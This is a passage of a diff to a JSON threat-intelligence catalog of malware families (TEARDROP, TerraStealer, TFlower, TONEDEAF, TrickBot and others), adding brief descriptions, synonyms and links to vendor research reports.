"https://twitter.com/TheEnergyStory/status/1346096298311741440", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b", + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://twitter.com/TheEnergyStory/status/1342041055563313152", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", + 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware", + "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate" + ], + "synonyms": [], + "type": [] + }, + "uuid": "efa01fef-7faf-4bb2-8630-b3a237df882a", + "value": "TEARDROP" + }, { "description": "", "meta": { 
@@ -16545,11 +30160,38 @@ "uuid": "aaa05037-aee1-4353-ace1-43ae0f558091", "value": "TefoSteal" }, + { + "description": "According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.telandext", + "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b2b5a816-2268-4cb8-9958-491356c452ec", + "value": "TelAndExt" + }, + { + "description": "According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb", + "https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "daf2f70b-205e-4b39-89a6-d382ded4c33c", + "value": "TelB" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", + "https://www.secureworks.com/research/threat-profiles/iron-viking", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], @@ -16563,6 +30205,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", + "https://www.secureworks.com/research/threat-profiles/iron-viking", "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" ], 
@@ -16616,6 +30259,87 @@ "uuid": "c0801a29-ecc4-449b-9a1b-9d2dbde1995d", "value": "Termite" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8036e023-c765-4bd6-828f-1c8d20987843", + "value": "TerraPreter" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ddfda5dc-a416-4cf3-b734-6aa083aa9e04", + "value": "TerraLoader" + }, + { + "description": "According to QuoINT TerraRecon is a reconnaissance tool, looking for a specific piece of hardware and software targeting retail and payment services sectors. Attributed to Golden Chickens.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_recon", + "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + ], + "synonyms": [ + "Taurus Loader Reconnaissance Module" + ], + "type": [] + }, + "uuid": "d8efa615-87bf-4477-8261-316215c0b637", + "value": "TerraRecon" + }, + { + "description": "According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool, targeting for example email clients, web browsers, and file transfer utilities. 
Attributed to Golden Chickens.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer", + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", + "https://twitter.com/3xp0rtblog/status/1275746149719252992" + ], + "synonyms": [ + "SONE", + "StealerOne", + "Taurus Loader Stealer Module" + ], + "type": [] + }, + "uuid": "d5c9a697-c7bf-4e13-8c2e-c74465e77208", + "value": "TerraStealer" + }, + { + "description": "TerraTV is a custom DLL designed to hijack legit TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to Golden Chickens malware as a service group.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv", + "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + ], + "synonyms": [ + "Taurus Loader TeamViewer Module" + ], + "type": [] + }, + "uuid": "0597af12-88d2-4289-a154-191774e3f48d", + "value": "TerraTV" + }, { "description": "", "meta": { 
@@ -16626,9 +30350,12 @@ "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", + "https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/", "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", - "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", - "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" + "https://community.riskiq.com/article/30f22a00", + "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack", + "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html", + "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/" ], "synonyms": [ "cryptesla" 
@@ -16638,6 +30365,21 @@ "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", "value": "TeslaCrypt" }, + { + "description": "TFlower is a new ransomware targeting mostly corporate networks discovered in August, 2019. It is reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware will conduct a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware also will terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extention to encrypted files, but prepends the marker \"*tflower\" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower", + "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign", + "https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/", + "https://www.sygnia.co/mata-framework" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bd5d0ff1-7bd1-4f8d-bf66-4d02f8e68dd2", + "value": "TFlower Ransomware" + }, { "description": "", "meta": { @@ -16668,6 +30410,19 @@ "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", "value": "Thanatos Ransomware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thinmon", + "https://mp.weixin.qq.com/s/nyxZFXgrtm2-tBiV3-wiMg" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a416e88b-8fc0-41a9-bb2e-13cbcc5f22b0", + "value": "ThinMon" + }, { "description": "", "meta": { 
@@ -16694,6 +30449,24 @@ "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", "value": "ThumbThief" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx", + "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html", + "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/", + "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/" + ], + "synonyms": [ + "Ranzy Locker" + ], + "type": [] + }, + "uuid": "e4be8d83-748e-46df-8dd7-0ce1b2255f36", + "value": "ThunderX Ransomware" + }, { "description": "", "meta": { 
@@ -16725,16 +30498,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", - "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", - "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", - "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan", + "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", - "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "http://garage4hackers.com/entry.php?b=3086", - "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", - "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/" + "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", + "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", + "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", + "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html" ], "synonyms": [ "Illi", 
@@ -16752,8 +30527,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", - "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0", - "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" + "https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf", + "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [], "type": [] @@ -16766,7 +30542,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", - "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + "https://github.com/SherifEldeeb/TinyMet", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://twitter.com/VK_Intel/status/1273292957429510150", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ "TiniMet" 
@@ -16781,14 +30564,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", - "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", + "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", - "https://krebsonsecurity.com/tag/nuclear-bot/", - "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/" + "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/", + "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", + "https://krebsonsecurity.com/tag/nuclear-bot/" ], "synonyms": [ "MicroBankingTrojan", @@ -16806,7 +30589,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", + "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign" ], "synonyms": [], "type": [] @@ -16819,6 +30603,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], 
@@ -16839,11 +30624,33 @@ "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", "value": "Tiop" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", + "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://vblocalhost.com/uploads/VB2020-20.pdf", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" + ], + "synonyms": [ + "LuckyBack" + ], + "type": [] + }, + "uuid": "8d7108fe-65be-4853-945d-1d5376dbaa34", + "value": "Tmanger" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", + "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.cert.pl/en/news/single/tofsee-en/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" 
@@ -16856,15 +30663,58 @@ "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", "value": "Tofsee" }, + { + "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files \u2013 temp.txt and temp2.txt \u2013 within the same directory of its execution.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", + "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77e29e3a-d4a3-4692-b1f8-38ad6dc1af1d", + "value": "TONEDEAF" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonnerre", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", + "https://research.checkpoint.com/2021/after-lightning-comes-thunder/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7590aa5-d9fb-449f-8a5e-5233077b736e", + "value": "Tonnerre" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma", + "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html", + "http://blog.nsfocus.net/stumbzarus-apt-lazarus/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "69860c07-2acb-4674-8e68-41a1d8fe958a", + "value": "Torisma" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", - 
"http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/", "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" ], - "synonyms": [], + "synonyms": [ + "Teerac" + ], "type": [] }, "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", @@ -16875,6 +30725,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trat", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.gdatasoftware.com/blog/trat-control-via-smartphone", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns" ], "synonyms": [], 
@@ -16901,57 +30755,183 @@ "value": "TreasureHunter" }, { - "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed", + "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\n2017 - Trickbot primarily uses Necurs as vehicle for installs.\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\nQ3/4 2018 - Trickbot starts being spread through Emotet.\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot\r\n3. 
Phish > Attached MS Office > Macro enabled > Trickbot installed", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", - "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", - "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", - "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", - "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez", + "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + 
"https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/", + "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://labs.vipre.com/trickbots-tricks/", + "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", + "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor", + "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737", + "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users", + "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", + "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/", + "https://blog.talosintelligence.com/2020/03/trickbot-primer.html", + "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/", + "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", + 
"https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/", + "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf", + "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/", + "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", + "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/", + "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet", + "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf", + "https://www.intrinsec.com/deobfuscating-hunting-ostap/", + "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", + 
"https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html", + "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/", + "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", + "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html", + "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", + "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + 
"https://www.youtube.com/watch?v=lTywPmZEU1A", + "https://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure", + "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", + "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/", + "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html", + "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", + "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html", "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", - "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", - "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", + "https://cofenselabs.com/all-you-need-is-text-second-wave/", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/", 
